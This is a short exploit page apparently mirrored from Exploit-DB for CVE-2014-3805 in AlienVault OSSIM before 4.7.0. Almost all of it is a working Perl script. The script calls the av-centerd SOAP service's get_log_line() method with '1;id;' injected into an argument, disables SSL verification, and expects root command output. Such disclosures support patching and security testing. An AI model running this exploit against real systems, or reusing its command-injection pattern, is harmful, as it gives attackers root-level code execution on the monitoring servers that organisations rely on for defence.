Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution

  • 作者: Alfredo Ramirez
    日期: 2014-06-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/33805/
  • # Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution
    # Date: 06/17/2014
    # Exploit Author: Alfredo Ramirez
    # Vendor Homepage: http://www.alienvault.com/
    # Software Link: http://www.alienvault.com/open-threat-exchange/projects
    # Version: < 4.7.0
    # Tested on: Debian/Virtual Appliance
    # CVE : CVE-2014-3805
    
     #!perl -w
    
    use SOAP::Lite;
    
    # SSL is self-signed so we have to ignore verification.
    $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;
    
    # We simply append the 'id' command to the number of log we want to
    # read.
    @soap_response = SOAP::Lite
    -> uri('AV/CC/Util')
    -> proxy('https://172.26.22.2:40007/av-centerd')
    -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
    -> result;
    
    for (@{ $soap_response[0] }) {
     print "$_\n";
    }
    
    # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)